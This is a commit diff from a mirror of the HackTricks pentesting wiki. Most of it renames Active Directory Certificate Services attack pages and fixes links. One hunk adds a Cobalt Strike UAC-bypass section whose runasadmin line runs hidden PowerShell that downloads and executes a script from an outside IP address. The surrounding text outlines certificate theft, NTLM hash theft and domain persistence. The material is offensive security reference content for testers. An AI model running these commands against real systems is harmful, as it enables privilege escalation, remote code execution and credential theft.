0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3451] No subject

This commit is contained in:
CPol 2022-09-03 00:24:33 +00:00 committed by gitbook-bot
parent 0437a86fff
commit f83a01bbfd
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
7 changed files with 24 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
SUMMARY.md
View File

@ -157,10 +157,10 @@
* [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
* [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md)
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-account-persistence.md)
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-escalation.md)
* [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-persistence.md)
* [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-certificate-theft.md)
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
* [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
* [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
* [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
* [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
* [BloodHound](windows-hardening/active-directory-methodology/bloodhound.md)

4
c2/cobalt-strike.md
View File

@ -65,6 +65,10 @@ ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
# UAC Bypass
elevate svc-exe <listener>
elevate uac-token-duplication <listener>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid
## Like make_token but stealing the token from a process

16
windows-hardening/active-directory-methodology/README.md
View File

@ -281,16 +281,16 @@ Usually users will access the system via RDP, so here you have how to performa c
Gathering certificates from the compromised machine could be a way to escalate privileges inside the environment:
{% content-ref url="ad-certificates/ad-cs-certificate-theft.md" %}
[ad-cs-certificate-theft.md](ad-certificates/ad-cs-certificate-theft.md)
{% content-ref url="ad-certificates/certificate-theft.md" %}
[certificate-theft.md](ad-certificates/certificate-theft.md)
{% endcontent-ref %}
### Certificate Templates Abuse
If vulnerable templates are configured it's possible to abuse them to escalate privileges:
{% content-ref url="ad-certificates/ad-cs-domain-escalation.md" %}
[ad-cs-domain-escalation.md](ad-certificates/ad-cs-domain-escalation.md)
{% content-ref url="ad-certificates/domain-escalation.md" %}
[domain-escalation.md](ad-certificates/domain-escalation.md)
{% endcontent-ref %}
## Post-exploitation with high privilege account
@ -352,16 +352,16 @@ These are like golden tickets forged in a way that **bypasses common golden tick
**Having certificates of an account or being able to request them** is a very good way to be able to persist in the users account (even if he changes the password):
{% content-ref url="ad-certificates/ad-cs-account-persistence.md" %}
[ad-cs-account-persistence.md](ad-certificates/ad-cs-account-persistence.md)
{% content-ref url="ad-certificates/account-persistence.md" %}
[account-persistence.md](ad-certificates/account-persistence.md)
{% endcontent-ref %}
### **Certificates Domain Persistence**
**Using certificates is also possible to persist with high privileges inside the domain:**
{% content-ref url="ad-certificates/ad-cs-domain-persistence.md" %}
[ad-cs-domain-persistence.md](ad-certificates/ad-cs-domain-persistence.md)
{% content-ref url="ad-certificates/domain-persistence.md" %}
[domain-persistence.md](ad-certificates/domain-persistence.md)
{% endcontent-ref %}
### AdminSDHolder Group

4
windows-hardening/active-directory-methodology/ad-certificates/ad-cs-account-persistence.md → windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
View File

@ -49,7 +49,7 @@ Rubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass
```
{% hint style="warning" %}
Combined with the technique outlined in the [**THEFT5**](ad-cs-certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the accounts NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
Combined with the technique outlined in the [**THEFT5**](certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the accounts NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
This is an alternative method of **long-term credential theft** that does **not touch LSASS** and is possible from a **non-elevated context.**
{% endhint %}
@ -57,7 +57,7 @@ This is an alternative method of **long-term credential theft** that does **not
If a certificate template allowed for **Domain Computers** as enrolment principals, an attacker could **enrol a compromised systems machine account**. The default **`Machine`** template matches all those characteristics.
If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](ad-cs-certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
You can use [**Certify**](https://github.com/GhostPack/Certify) **** to **** gather a certificate for the machine account elevating automatically to SYSTEM with:

2
windows-hardening/active-directory-methodology/ad-certificates/ad-cs-certificate-theft.md → windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
View File

@ -1,4 +1,4 @@
# Certificate Theft
# AD CS Certificate Theft
<details>

6
windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-escalation.md → windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
View File

@ -263,7 +263,7 @@ The two main rights here are the **`ManageCA`** right and the **`ManageCertifica
#### Abuse
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](ad-cs-domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
<figure><img src="../../../.gitbook/assets/image (1) (2) (1).png" alt=""><figcaption></figcaption></figure>
@ -390,8 +390,8 @@ Common **problems** with NTLM relay attacks are that the **NTLM sessions are usu
However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check:
{% content-ref url="ad-cs-account-persistence.md" %}
[ad-cs-account-persistence.md](ad-cs-account-persistence.md)
{% content-ref url="account-persistence.md" %}
[account-persistence.md](account-persistence.md)
{% endcontent-ref %}
Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. An attacker could wait or could try to **force** it:

4
windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-persistence.md → windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
View File

@ -26,7 +26,7 @@ How can you tell that a certificate is a CA certificate?
* There are **no EKUs**
The built-in GUI supported way to **extract this certificate private key** is with `certsrv.msc` on the CA server.\
However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](ad-cs-certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
You can also get the cert and private key using [**certipy**](https://github.com/ly4k/Certipy):
@ -67,7 +67,7 @@ The specified certificate should **work with the previously detailed forgery met
## Malicious Misconfiguration - DPERSIST3
There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](ad-cs-domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
* **CA servers AD computer** object
* The **CA servers RPC/DCOM server**